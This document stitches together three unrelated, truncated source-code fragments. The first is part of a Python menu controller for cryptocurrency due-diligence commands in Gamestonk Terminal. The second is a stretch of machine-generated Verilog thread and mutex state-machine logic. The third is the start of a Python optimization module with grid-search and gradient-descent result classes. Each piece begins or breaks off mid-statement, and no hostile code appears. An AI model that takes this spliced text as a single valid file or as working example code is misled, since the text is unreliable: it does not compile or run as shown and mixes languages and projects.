from binance.client import Client
from prompt_toolkit.completion import NestedCompleter
from gamestonk_terminal import feature_flags as gtff
from gamestonk_terminal.menu import session
from gamestonk_terminal.cryptocurrency.due_diligence import (
pycoingecko_view,
coinpaprika_view,
binance_view,
coinbase_model,
binance_model,
coinbase_view,
)
from gamestonk_terminal.helper_funcs import (
get_flair,
parse_known_args_and_warn,
check_positive,
)
from gamestonk_terminal.cryptocurrency.due_diligence.coinpaprika_view import CURRENCIES
from gamestonk_terminal.cryptocurrency.cryptocurrency_helpers import plot_chart
import gamestonk_terminal.config_terminal as cfg
class DueDiligenceController:
CHOICES = [
"?",
"cls",
"help",
"q",
"quit",
"chart",
]
SPECIFIC_CHOICES = {
"cp": [
"events",
"twitter",
"ex",
"mkt",
"ps",
"basic",
],
"cg": [
"info",
"market",
"ath",
"atl",
"score",
"web",
"social",
"bc",
"dev",
],
"bin": [
"book",
"balance",
],
"cb": ["book", "trades", "stats"],
}
DD_VIEWS_MAPPING = {
"cg": pycoingecko_view,
"cp": coinpaprika_view,
"bin": binance_view,
}
def __init__(self, coin=None, source=None):
"""CONSTRUCTOR"""
self._dd_parser = argparse.ArgumentParser(add_help=False, prog="dd")
self.current_coin = coin
self.current_currency = None
self.current_df = pd.DataFrame()
self.source = source
self.CHOICES.extend(self.SPECIFIC_CHOICES[self.source])
self._dd_parser.add_argument("cmd", choices=self.CHOICES)
def print_help(self):
"""Print help"""
help_text = """
Due Diligence:
cls clear screen
?/help show this menu again
q quit this menu, and shows back to main menu
quit quit to abandon the program
"""
if self.source == "cp":
help_text += """
CoinPaprika:
basic basic information about loaded coin
ps price and supply related metrics for loaded coin
mkt all markets for loaded coin
ex all exchanges where loaded coin is listed
twitter tweets for loaded coin
events events related to loaded coin
"""
if self.source == "cg":
help_text += """
CoinGecko:
info basic information about loaded coin
market market stats about loaded coin
ath all time high related stats for loaded coin
atl all time low related stats for loaded coin
web found websites for loaded coin e.g forum, homepage
social social portals urls for loaded coin, e.g reddit, twitter
score different kind of scores for loaded coin, e.g developer score, sentiment score
dev github, bitbucket coin development statistics
bc links to blockchain explorers for loaded coin
"""
if self.source == "bin":
help_text += """
Binance:
book show order book
balance show coin balance
"""
if self.source == "cb":
help_text += """
Coinbase:
book show order book
trades show last trades
stats show coin stats
"""
help_text += " chart display chart\n"
print(help_text)
def switch(self, an_input: str):
"""Process and dispatch input
Returns
-------
True, False or None
False - quit the menu
True - quit the program
None - continue in the menu
"""
# Empty command
if not an_input:
print("")
return None
(known_args, other_args) = self._dd_parser.parse_known_args(an_input.split())
# Help menu again
if known_args.cmd == "?":
self.print_help()
return None
# Clear screen
if known_args.cmd == "cls":
os.system("cls||clear")
return None
return getattr(
self, "call_" + known_args.cmd, lambda: "Command not recognized!"
)(other_args)
def call_help(self, _):
"""Process Help command"""
self.print_help()
def call_q(self, _):
"""Process Q command - quit the menu."""
print("Moving back to (crypto) menu")
return False
def call_quit(self, _):
"""Process Quit command - quit the program."""
return True
def call_info(self, other_args):
"""Process info command"""
if self.current_coin:
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="info",
description="""
Shows basic information about loaded coin like:
Name, Symbol, Description, Market Cap, Public Interest, Supply, and Price related metrics
""",
)
parser.add_argument(
"--export",
choices=["csv", "json", "xlsx"],
default="",
type=str,
dest="export",
help="Export dataframe data to csv,json,xlsx file",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
pycoingecko_view.display_info(
coin=self.current_coin, export=ns_parser.export
)
except Exception as e:
print(e, "\n")
else:
print(
"No coin selected. Use 'load' to load the coin you want to look at.\n"
)
def call_market(self, other_args):
"""Process market command"""
if self.current_coin:
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="market",
description="""
Market data for loaded coin. There you find metrics like:
Market Cap, Supply, Circulating Supply, Price, Volume and many others.
""",
)
parser.add_argument(
"--export",
choices=["csv", "json", "xlsx"],
default="",
type=str,
dest="export",
help="Export dataframe data to csv,json,xlsx file",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
pycoingecko_view.display_market(self.current_coin, ns_parser.export)
except Exception as e:
print(e, "\n")
else:
print(
"No coin selected. Use 'load' to load the coin you want to look at.\n"
)
def call_web(self, other_args):
"""Process web command"""
if self.current_coin:
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="web",
description="""Websites found for given Coin. You can find there urls to
homepage, forum, announcement site and others.""",
)
parser.add_argument(
"--export",
choices=["csv", "json", "xlsx"],
default="",
type=str,
dest="export",
help="Export dataframe data to csv,json,xlsx file",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
pycoingecko_view.display_web(self.current_coin, export=ns_parser.export)
except Exception as e:
print(e, "\n")
else:
print(
"No coin selected. Use 'load' to load the coin you want to look at.\n"
)
def call_social(self, other_args):
"""Process social command"""
if self.current_coin:
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="social",
description="""Shows social media corresponding to loaded coin. You can find there name of
telegram channel, urls to twitter, reddit, bitcointalk, facebook and discord.""",
)
parser.add_argument(
"--export",
choices=["csv", "json", "xlsx"],
default="",
type=str,
dest="export",
help="Export dataframe data to csv,json,xlsx file",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
pycoingecko_view.display_social(
self.current_coin, export=ns_parser.export
)
except Exception as e:
print(e, "\n")
else:
print(
"No coin selected. Use 'load' to load the coin you want to look at.\n"
)
def call_dev(self, other_args):
"""Process dev command"""
if self.current_coin:
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="dev",
description="""
Developers data for loaded coin. If the development data is available you can see
how the code development of given coin is going on.
There are some statistics that shows number of stars, forks, subscribers, pull requests,
commits, merges, contributors on github.""",
)
parser.add_argument(
"--export",
choices=["csv", "json", "xlsx"],
default="",
type=str,
dest="export",
help="Export dataframe data to csv,json,xlsx file",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
pycoingecko_view.display_dev(self.current_coin, ns_parser.export)
except Exception as e:
print(e, "\n")
else:
print(
"No coin selected. Use 'load' to load the coin you want to look at.\n"
)
def call_ath(self, other_args):
"""Process ath command"""
if self.current_coin:
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="ath",
description="""All time high data for loaded coin""",
)
parser.add_argument(
"--export",
choices=["csv", "json", "xlsx"],
default="",
type=str,
dest="export",
help="Export dataframe data to csv,json,xlsx file",
)
parser.add_argument(
"--vs",
dest="vs",
help="currency",
default="usd",
choices=["usd", "btc"],
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
pycoingecko_view.display_ath(
self.current_coin, ns_parser.vs, ns_parser.export
)
except Exception as e:
print(e, "\n")
else:
print(
"No coin selected. Use 'load' to load the coin you want to look at.\n"
)
def call_atl(self, other_args):
"""Process atl command"""
if self.current_coin:
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="atl",
description="""All time low data for loaded coin""",
)
parser.add_argument(
"--vs",
dest="vs",
help="currency",
default="usd",
choices=["usd", "btc"],
)
parser.add_argument(
"--export",
choices=["csv", "json", "xlsx"],
default="",
type=str,
dest="export",
help="Export dataframe data to csv,json,xlsx file",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
pycoingecko_view.display_atl(
self.current_coin, ns_parser.vs, ns_parser.export
)
except Exception as e:
print(e, "\n")
else:
print(
"No coin selected. Use 'load' to load the coin you want to look at.\n"
)
def call_score(self, other_args):
"""Process score command"""
if self.current_coin:
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="score",
description="""
In this view you can find different kind of scores for loaded coin.
Those scores represents different rankings, sentiment metrics, some user stats and others.
You will see CoinGecko scores, Developer Scores, Community Scores, Sentiment, Reddit scores
and many others.
""",
)
parser.add_argument(
"--export",
choices=["csv", "json", "xlsx"],
default="",
type=str,
dest="export",
help="Export dataframe data to csv,json,xlsx file",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
pycoingecko_view.display_score(self.current_coin, ns_parser.export)
except Exception as e:
print(e, "\n")
else:
print(
"No coin selected. Use 'load' to load the coin you want to look at.\n"
)
def call_bc(self, other_args):
"""Process bc command"""
if self.current_coin:
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
prog="bc",
description="""
Blockchain explorers URLs for loaded coin. Those are sites like etherescan.io or polkascan.io
in which you can see all blockchain data e.g. all txs, all tokens, all contracts...
""",
)
parser.add_argument(
"--export",
choices=["csv", "json", "xlsx"],
default="",
type=str,
dest="export",
help="Export dataframe data to csv,json,xlsx file",
)
try:
ns_parser = parse_known_args_and_warn(parser, other_args)
if not ns_parser:
return
pycoingecko_view.display_bc(self.current_coin, ns_parser.export)
except Exception as e:
print(e, "\n")
else:
print(
"No coin selected. Use 'load' to load the coin you want to look at.\n"
)
# binance
def call_book(self, other_args):
"""Process book command"""
if self.current_coin:
parser = argparse.ArgumentParser(
prog="book",
add_help=False,
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description="Get the order | |
begin
th_myfunc_4 <= th_myfunc_4_1;
end
end
th_myfunc_4_1: begin
_th_myfunc_4_tid_22 <= _th_myfunc_4_tid_21;
th_myfunc_4 <= th_myfunc_4_2;
end
th_myfunc_4_2: begin
$display("-- Thread %d TryLock", _th_myfunc_4_tid_22);
th_myfunc_4 <= th_myfunc_4_3;
end
th_myfunc_4_3: begin
th_myfunc_4 <= th_myfunc_4_4;
end
th_myfunc_4_4: begin
_tmp_8 <= _mymutex_lock_reg & (_mymutex_lock_id == 4);
th_myfunc_4 <= th_myfunc_4_5;
end
th_myfunc_4_5: begin
_th_myfunc_4_lock_23 <= _tmp_8;
th_myfunc_4 <= th_myfunc_4_6;
end
th_myfunc_4_6: begin
_th_myfunc_4_waitcount_24 <= 0;
th_myfunc_4 <= th_myfunc_4_7;
end
th_myfunc_4_7: begin
if(!_th_myfunc_4_lock_23) begin
th_myfunc_4 <= th_myfunc_4_8;
end else begin
th_myfunc_4 <= th_myfunc_4_14;
end
end
th_myfunc_4_8: begin
$display("-- Thread %d TryLock", _th_myfunc_4_tid_22);
th_myfunc_4 <= th_myfunc_4_9;
end
th_myfunc_4_9: begin
_th_myfunc_4_waitcount_24 <= _th_myfunc_4_waitcount_24 + 1;
th_myfunc_4 <= th_myfunc_4_10;
end
th_myfunc_4_10: begin
th_myfunc_4 <= th_myfunc_4_11;
end
th_myfunc_4_11: begin
_tmp_9 <= _mymutex_lock_reg & (_mymutex_lock_id == 4);
th_myfunc_4 <= th_myfunc_4_12;
end
th_myfunc_4_12: begin
_th_myfunc_4_lock_23 <= _tmp_9;
th_myfunc_4 <= th_myfunc_4_13;
end
th_myfunc_4_13: begin
th_myfunc_4 <= th_myfunc_4_7;
end
th_myfunc_4_14: begin
$display("Thread %d Lock: waitcount=%d", _th_myfunc_4_tid_22, _th_myfunc_4_waitcount_24);
th_myfunc_4 <= th_myfunc_4_15;
end
th_myfunc_4_15: begin
_th_myfunc_4_i_25 <= 0;
th_myfunc_4 <= th_myfunc_4_16;
end
th_myfunc_4_16: begin
if(_th_myfunc_4_i_25 < 20) begin
th_myfunc_4 <= th_myfunc_4_17;
end else begin
th_myfunc_4 <= th_myfunc_4_18;
end
end
th_myfunc_4_17: begin
_th_myfunc_4_i_25 <= _th_myfunc_4_i_25 + 1;
th_myfunc_4 <= th_myfunc_4_16;
end
th_myfunc_4_18: begin
$display("Thread %d Hello", _th_myfunc_4_tid_22);
th_myfunc_4 <= th_myfunc_4_19;
end
th_myfunc_4_19: begin
th_myfunc_4 <= th_myfunc_4_20;
end
th_myfunc_4_20: begin
$display("Thread %d Unlock", _th_myfunc_4_tid_22);
th_myfunc_4 <= th_myfunc_4_21;
end
endcase
end
end
localparam th_myfunc_5_1 = 1;
localparam th_myfunc_5_2 = 2;
localparam th_myfunc_5_3 = 3;
localparam th_myfunc_5_4 = 4;
localparam th_myfunc_5_5 = 5;
localparam th_myfunc_5_6 = 6;
localparam th_myfunc_5_7 = 7;
localparam th_myfunc_5_8 = 8;
localparam th_myfunc_5_9 = 9;
localparam th_myfunc_5_10 = 10;
localparam th_myfunc_5_11 = 11;
localparam th_myfunc_5_12 = 12;
localparam th_myfunc_5_13 = 13;
localparam th_myfunc_5_14 = 14;
localparam th_myfunc_5_15 = 15;
localparam th_myfunc_5_16 = 16;
localparam th_myfunc_5_17 = 17;
localparam th_myfunc_5_18 = 18;
localparam th_myfunc_5_19 = 19;
localparam th_myfunc_5_20 = 20;
localparam th_myfunc_5_21 = 21;
always @(posedge CLK) begin
if(RST) begin
th_myfunc_5 <= th_myfunc_5_init;
_th_myfunc_5_called <= 0;
_th_myfunc_5_tid_26 <= 0;
_th_myfunc_5_tid_27 <= 0;
_tmp_10 <= 0;
_th_myfunc_5_lock_28 <= 0;
_th_myfunc_5_waitcount_29 <= 0;
_tmp_11 <= 0;
_th_myfunc_5_i_30 <= 0;
end else begin
case(th_myfunc_5)
th_myfunc_5_init: begin
if(_th_myfunc_start[5] && (th_blink == 4)) begin
_th_myfunc_5_called <= 1;
end
if(_th_myfunc_start[5] && (th_blink == 4)) begin
_th_myfunc_5_tid_26 <= _th_blink_tid_0;
end
if((th_blink == 4) && _th_myfunc_start[5]) begin
th_myfunc_5 <= th_myfunc_5_1;
end
end
th_myfunc_5_1: begin
_th_myfunc_5_tid_27 <= _th_myfunc_5_tid_26;
th_myfunc_5 <= th_myfunc_5_2;
end
th_myfunc_5_2: begin
$display("-- Thread %d TryLock", _th_myfunc_5_tid_27);
th_myfunc_5 <= th_myfunc_5_3;
end
th_myfunc_5_3: begin
th_myfunc_5 <= th_myfunc_5_4;
end
th_myfunc_5_4: begin
_tmp_10 <= _mymutex_lock_reg & (_mymutex_lock_id == 5);
th_myfunc_5 <= th_myfunc_5_5;
end
th_myfunc_5_5: begin
_th_myfunc_5_lock_28 <= _tmp_10;
th_myfunc_5 <= th_myfunc_5_6;
end
th_myfunc_5_6: begin
_th_myfunc_5_waitcount_29 <= 0;
th_myfunc_5 <= th_myfunc_5_7;
end
th_myfunc_5_7: begin
if(!_th_myfunc_5_lock_28) begin
th_myfunc_5 <= th_myfunc_5_8;
end else begin
th_myfunc_5 <= th_myfunc_5_14;
end
end
th_myfunc_5_8: begin
$display("-- Thread %d TryLock", _th_myfunc_5_tid_27);
th_myfunc_5 <= th_myfunc_5_9;
end
th_myfunc_5_9: begin
_th_myfunc_5_waitcount_29 <= _th_myfunc_5_waitcount_29 + 1;
th_myfunc_5 <= th_myfunc_5_10;
end
th_myfunc_5_10: begin
th_myfunc_5 <= th_myfunc_5_11;
end
th_myfunc_5_11: begin
_tmp_11 <= _mymutex_lock_reg & (_mymutex_lock_id == 5);
th_myfunc_5 <= th_myfunc_5_12;
end
th_myfunc_5_12: begin
_th_myfunc_5_lock_28 <= _tmp_11;
th_myfunc_5 <= th_myfunc_5_13;
end
th_myfunc_5_13: begin
th_myfunc_5 <= th_myfunc_5_7;
end
th_myfunc_5_14: begin
$display("Thread %d Lock: waitcount=%d", _th_myfunc_5_tid_27, _th_myfunc_5_waitcount_29);
th_myfunc_5 <= th_myfunc_5_15;
end
th_myfunc_5_15: begin
_th_myfunc_5_i_30 <= 0;
th_myfunc_5 <= th_myfunc_5_16;
end
th_myfunc_5_16: begin
if(_th_myfunc_5_i_30 < 20) begin
th_myfunc_5 <= th_myfunc_5_17;
end else begin
th_myfunc_5 <= th_myfunc_5_18;
end
end
th_myfunc_5_17: begin
_th_myfunc_5_i_30 <= _th_myfunc_5_i_30 + 1;
th_myfunc_5 <= th_myfunc_5_16;
end
th_myfunc_5_18: begin
$display("Thread %d Hello", _th_myfunc_5_tid_27);
th_myfunc_5 <= th_myfunc_5_19;
end
th_myfunc_5_19: begin
th_myfunc_5 <= th_myfunc_5_20;
end
th_myfunc_5_20: begin
$display("Thread %d Unlock", _th_myfunc_5_tid_27);
th_myfunc_5 <= th_myfunc_5_21;
end
endcase
end
end
localparam th_myfunc_6_1 = 1;
localparam th_myfunc_6_2 = 2;
localparam th_myfunc_6_3 = 3;
localparam th_myfunc_6_4 = 4;
localparam th_myfunc_6_5 = 5;
localparam th_myfunc_6_6 = 6;
localparam th_myfunc_6_7 = 7;
localparam th_myfunc_6_8 = 8;
localparam th_myfunc_6_9 = 9;
localparam th_myfunc_6_10 = 10;
localparam th_myfunc_6_11 = 11;
localparam th_myfunc_6_12 = 12;
localparam th_myfunc_6_13 = 13;
localparam th_myfunc_6_14 = 14;
localparam th_myfunc_6_15 = 15;
localparam th_myfunc_6_16 = 16;
localparam th_myfunc_6_17 = 17;
localparam th_myfunc_6_18 = 18;
localparam th_myfunc_6_19 = 19;
localparam th_myfunc_6_20 = 20;
localparam th_myfunc_6_21 = 21;
always @(posedge CLK) begin
if(RST) begin
th_myfunc_6 <= th_myfunc_6_init;
_th_myfunc_6_called <= 0;
_th_myfunc_6_tid_31 <= 0;
_th_myfunc_6_tid_32 <= 0;
_tmp_12 <= 0;
_th_myfunc_6_lock_33 <= 0;
_th_myfunc_6_waitcount_34 <= 0;
_tmp_13 <= 0;
_th_myfunc_6_i_35 <= 0;
end else begin
case(th_myfunc_6)
th_myfunc_6_init: begin
if(_th_myfunc_start[6] && (th_blink == 4)) begin
_th_myfunc_6_called <= 1;
end
if(_th_myfunc_start[6] && (th_blink == 4)) begin
_th_myfunc_6_tid_31 <= _th_blink_tid_0;
end
if((th_blink == 4) && _th_myfunc_start[6]) begin
th_myfunc_6 <= th_myfunc_6_1;
end
end
th_myfunc_6_1: begin
_th_myfunc_6_tid_32 <= _th_myfunc_6_tid_31;
th_myfunc_6 <= th_myfunc_6_2;
end
th_myfunc_6_2: begin
$display("-- Thread %d TryLock", _th_myfunc_6_tid_32);
th_myfunc_6 <= th_myfunc_6_3;
end
th_myfunc_6_3: begin
th_myfunc_6 <= th_myfunc_6_4;
end
th_myfunc_6_4: begin
_tmp_12 <= _mymutex_lock_reg & (_mymutex_lock_id == 6);
th_myfunc_6 <= th_myfunc_6_5;
end
th_myfunc_6_5: begin
_th_myfunc_6_lock_33 <= _tmp_12;
th_myfunc_6 <= th_myfunc_6_6;
end
th_myfunc_6_6: begin
_th_myfunc_6_waitcount_34 <= 0;
th_myfunc_6 <= th_myfunc_6_7;
end
th_myfunc_6_7: begin
if(!_th_myfunc_6_lock_33) begin
th_myfunc_6 <= th_myfunc_6_8;
end else begin
th_myfunc_6 <= th_myfunc_6_14;
end
end
th_myfunc_6_8: begin
$display("-- Thread %d TryLock", _th_myfunc_6_tid_32);
th_myfunc_6 <= th_myfunc_6_9;
end
th_myfunc_6_9: begin
_th_myfunc_6_waitcount_34 <= _th_myfunc_6_waitcount_34 + 1;
th_myfunc_6 <= th_myfunc_6_10;
end
th_myfunc_6_10: begin
th_myfunc_6 <= th_myfunc_6_11;
end
th_myfunc_6_11: begin
_tmp_13 <= _mymutex_lock_reg & (_mymutex_lock_id == 6);
th_myfunc_6 <= th_myfunc_6_12;
end
th_myfunc_6_12: begin
_th_myfunc_6_lock_33 <= _tmp_13;
th_myfunc_6 <= th_myfunc_6_13;
end
th_myfunc_6_13: begin
th_myfunc_6 <= th_myfunc_6_7;
end
th_myfunc_6_14: begin
$display("Thread %d Lock: waitcount=%d", _th_myfunc_6_tid_32, _th_myfunc_6_waitcount_34);
th_myfunc_6 <= th_myfunc_6_15;
end
th_myfunc_6_15: begin
_th_myfunc_6_i_35 <= 0;
th_myfunc_6 <= th_myfunc_6_16;
end
th_myfunc_6_16: begin
if(_th_myfunc_6_i_35 < 20) begin
th_myfunc_6 <= th_myfunc_6_17;
end else begin
th_myfunc_6 <= th_myfunc_6_18;
end
end
th_myfunc_6_17: begin
_th_myfunc_6_i_35 <= _th_myfunc_6_i_35 + 1;
th_myfunc_6 <= th_myfunc_6_16;
end
th_myfunc_6_18: begin
$display("Thread %d Hello", _th_myfunc_6_tid_32);
th_myfunc_6 <= th_myfunc_6_19;
end
th_myfunc_6_19: begin
th_myfunc_6 <= th_myfunc_6_20;
end
th_myfunc_6_20: begin
$display("Thread %d Unlock", _th_myfunc_6_tid_32);
th_myfunc_6 <= th_myfunc_6_21;
end
endcase
end
end
localparam th_myfunc_7_1 = 1;
localparam th_myfunc_7_2 = 2;
localparam th_myfunc_7_3 = 3;
localparam th_myfunc_7_4 = 4;
localparam th_myfunc_7_5 = 5;
localparam th_myfunc_7_6 = 6;
localparam th_myfunc_7_7 = 7;
localparam th_myfunc_7_8 = 8;
localparam th_myfunc_7_9 = 9;
localparam th_myfunc_7_10 = 10;
localparam th_myfunc_7_11 = 11;
localparam th_myfunc_7_12 = 12;
localparam th_myfunc_7_13 = 13;
localparam th_myfunc_7_14 = 14;
localparam th_myfunc_7_15 = 15;
localparam th_myfunc_7_16 = 16;
localparam th_myfunc_7_17 = 17;
localparam th_myfunc_7_18 = 18;
localparam th_myfunc_7_19 = 19;
localparam th_myfunc_7_20 = 20;
localparam th_myfunc_7_21 = 21;
always @(posedge CLK) begin
if(RST) begin
th_myfunc_7 <= th_myfunc_7_init;
_th_myfunc_7_called <= 0;
_th_myfunc_7_tid_36 <= 0;
_th_myfunc_7_tid_37 <= 0;
_tmp_14 <= 0;
_th_myfunc_7_lock_38 <= 0;
_th_myfunc_7_waitcount_39 <= 0;
_tmp_15 <= 0;
_th_myfunc_7_i_40 <= 0;
end else begin
case(th_myfunc_7)
th_myfunc_7_init: begin
if(_th_myfunc_start[7] && (th_blink == 4)) begin
_th_myfunc_7_called <= 1;
end
if(_th_myfunc_start[7] && (th_blink == 4)) begin
_th_myfunc_7_tid_36 <= _th_blink_tid_0;
end
if((th_blink == 4) && _th_myfunc_start[7]) begin
th_myfunc_7 <= th_myfunc_7_1;
end
end
th_myfunc_7_1: begin
_th_myfunc_7_tid_37 <= _th_myfunc_7_tid_36;
th_myfunc_7 <= th_myfunc_7_2;
end
th_myfunc_7_2: begin
$display("-- Thread %d TryLock", _th_myfunc_7_tid_37);
th_myfunc_7 <= th_myfunc_7_3;
end
th_myfunc_7_3: begin
th_myfunc_7 <= th_myfunc_7_4;
end
th_myfunc_7_4: begin
_tmp_14 <= _mymutex_lock_reg & (_mymutex_lock_id == 7);
th_myfunc_7 <= th_myfunc_7_5;
end
th_myfunc_7_5: begin
_th_myfunc_7_lock_38 <= _tmp_14;
th_myfunc_7 <= th_myfunc_7_6;
end
th_myfunc_7_6: begin
_th_myfunc_7_waitcount_39 <= 0;
th_myfunc_7 <= th_myfunc_7_7;
end
th_myfunc_7_7: begin
if(!_th_myfunc_7_lock_38) begin
th_myfunc_7 <= th_myfunc_7_8;
end else begin
th_myfunc_7 <= th_myfunc_7_14;
end
end
th_myfunc_7_8: begin
$display("-- Thread %d TryLock", _th_myfunc_7_tid_37);
th_myfunc_7 <= th_myfunc_7_9;
end
th_myfunc_7_9: begin
_th_myfunc_7_waitcount_39 <= _th_myfunc_7_waitcount_39 + 1;
th_myfunc_7 <= th_myfunc_7_10;
end
th_myfunc_7_10: begin
th_myfunc_7 <= th_myfunc_7_11;
end
th_myfunc_7_11: begin
_tmp_15 <= _mymutex_lock_reg & (_mymutex_lock_id == 7);
th_myfunc_7 <= th_myfunc_7_12;
end
th_myfunc_7_12: begin
_th_myfunc_7_lock_38 <= _tmp_15;
th_myfunc_7 <= th_myfunc_7_13;
end
th_myfunc_7_13: begin
th_myfunc_7 <= th_myfunc_7_7;
end
th_myfunc_7_14: begin
$display("Thread %d Lock: waitcount=%d", _th_myfunc_7_tid_37, _th_myfunc_7_waitcount_39);
th_myfunc_7 <= th_myfunc_7_15;
end
th_myfunc_7_15: begin
_th_myfunc_7_i_40 <= 0;
th_myfunc_7 <= th_myfunc_7_16;
end
th_myfunc_7_16: begin
if(_th_myfunc_7_i_40 < 20) begin
th_myfunc_7 <= th_myfunc_7_17;
end else begin
th_myfunc_7 <= th_myfunc_7_18;
end
end
th_myfunc_7_17: begin
_th_myfunc_7_i_40 <= _th_myfunc_7_i_40 + 1;
th_myfunc_7 <= th_myfunc_7_16;
end
th_myfunc_7_18: begin
$display("Thread %d Hello", _th_myfunc_7_tid_37);
th_myfunc_7 | |
# -*- coding: utf-8 -*-
"""
Optimization Methods
====================
"""
from __future__ import division
import itertools
from collections import defaultdict
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from scipy import optimize
from . import tools
from .tests import PerformanceTest, get_train_result
from .models import (EloModel, PFAExt, PFAExtSpacing, PFAExtStaircase,
PFAGong, PFAModel, PFAGongTiming)
class GridResult(object):
"""Represents a GRID search result.
:param grid: A matrix representing the results of the search.
:type grid: :class:`numpy.matrix`
:param xlabel: Name of the x-axis.
:type xlabel: str
:param ylavel: Name of the y-axis.
:type ylabel: str
:param xvalues: Values on the x-axis.
:type xvalues: list
:param yvalues: Values on the y-axis.
:type yvalues: list
"""
def __init__(self, grid,
xlabel=None, ylabel=None,
xvalues=None, yvalues=None):
self.grid = grid
self.xlabel = xlabel
self.ylabel = ylabel
self.xvalues = xvalues
self.yvalues = yvalues
self.extent = np.array([
min(self.xvalues), max(self.xvalues),
max(self.yvalues), min(self.yvalues),
])
@tools.cached_property
def rmse(self):
"""Grid Search errors estimations using RMSE."""
return np.array([
[result.rmse for result in row] for row in self.grid
])
@tools.cached_property
def auc(self):
"""Grid Search errors estimations using AUC."""
return np.array([
[result.auc for result in row] for row in self.grid
])
@tools.cached_property
def off(self):
"""Grid Search errors estimations using the average of
``predicted - observerd``.
"""
return np.array([
[result.off for result in row] for row in self.grid
])
@tools.cached_property
def rmse_best(self):
"""Values of `xvalues` and `yvalues` with best RMSE."""
minimum = np.unravel_index(self.rmse.argmin(), self.rmse.shape)
return np.array([self.xvalues[minimum[1]], self.yvalues[minimum[0]]])
@tools.cached_property
def auc_best(self):
"""Values of `xvalues` and `yvalues` with best AUC."""
maximum = np.unravel_index(self.auc.argmax(), self.auc.shape)
return np.array([self.xvalues[maximum[1]], self.yvalues[maximum[0]]])
def _plot_grid(self, grid, **img_kwargs):
"""Plots the result of the GRID search.
Uses :func:`~matplotlib.pyplot.imshow` to plot the data.
:param grid: The grid to plot.
:type grid: list of lists or :class:`numpy.matrix`.
:param **img_kwargs: Key-word arguments passed to the
:func:`~matplotlib.pyplot.imshow`.
"""
img_kwargs.setdefault('cmap', cm.Greys)
img_kwargs.setdefault('interpolation', 'nearest')
img_kwargs.setdefault('extent', self.extent)
img_kwargs.setdefault('aspect', 'auto')
img_title = img_kwargs.pop('title', 'Grid Search')
img_xlabel = img_kwargs.pop('xlabel', self.xlabel)
img_ylabel = img_kwargs.pop('ylabel', self.ylabel)
plot = plt.imshow(grid, **img_kwargs)
plt.colorbar(plot)
plt.xlabel(img_xlabel)
plt.ylabel(img_ylabel)
plt.title(img_title)
plt.show()
return plot
def plot_rmse(self, **img_kwargs):
"""Plots the result of the GRID search.
Uses :func:`~matplotlib.pyplot.imshow` to plot the data.
:param **img_kwargs: Key-word arguments passed to the
:func:`~matplotlib.pyplot.imshow`.
"""
img_kwargs.setdefault('title', 'Grid Search, metric: RMSE')
img_kwargs.setdefault('cmap', cm.Greys_r)
return self._plot_grid(self.rmse, **img_kwargs)
def plot_auc(self, **img_kwargs):
"""Plots the result of the GRID search.
Uses :func:`~matplotlib.pyplot.imshow` to plot the data.
:param **img_kwargs: Key-word arguments passed to the
:func:`~matplotlib.pyplot.imshow`.
"""
img_kwargs.setdefault('title', 'Grid Search, metric: AUC')
return self._plot_grid(self.auc, **img_kwargs)
def plot_off(self, **img_kwargs):
"""Plots the result of the GRID search.
Uses :func:`~matplotlib.pyplot.imshow` to plot the data.
:param **img_kwargs: Key-word arguments passed to the
:func:`~matplotlib.pyplot.imshow`.
"""
img_kwargs.setdefault('title',
'Grid Search, metric: observed - predicted')
return self._plot_grid(self.off, **img_kwargs)
def plot(self):
"""Plots the result of the GRID search.
Uses :func:`~matplotlib.pyplot.imshow` to plot the data.
"""
plt.figure(1)
plt.subplot(121)
plot1 = self.plot_rmse()
plt.subplot(122)
plot2 = self.plot_auc()
return [plot1, plot2]
def __str__(self):
return self.__repr__()
def __repr__(self):
return (
'RMSE:\n min: {0}\n {1}'
'\n\n'
'AUC:\n min: {2}\n {3}'
).format(
self.rmse_min.round(3),
self.rmse.round(3),
self.auc_min.round(3),
self.auc.round(3),
)
class DescentResult(object):
"""Representation of the result of NaiveDescent."""
def __init__(self, params, grads):
self.params = pd.DataFrame(params)
self.grads = pd.Series(grads)
self.iterations = len(self.grads)
@property
def best(self):
"""The best fitted parameters."""
return self.params.iloc[-1]
def __str__(self):
return self.__repr__()
def __repr__(self):
return (
'Iterations: {}\n'
'Best:\n{}'
).format(
self.iterations,
self.best.round(3),
)
class GradientResult(object):
"""Representation of the result of GradientDescent."""
def __init__(self, model, parameters):
self.model = model
self.parameters = parameters
self.iterations = range(len(parameters))
self.deltas = [params['delta'] for params in self.parameters]
self.gammas = [params['gamma'] for params in self.parameters]
self.staircases = [params['staircase'] for params in self.parameters]
self.intervals = list(sorted(i for i in self.staircases[-1]))
@property
def best(self):
"""The best fitted parameters."""
return {
'gamma': self.gammas[-1],
'delta': self.deltas[-1],
'staircase': self.staircases[-1],
}
def plot(self, **kwargs):
"""Plots the result of the gradient descent.
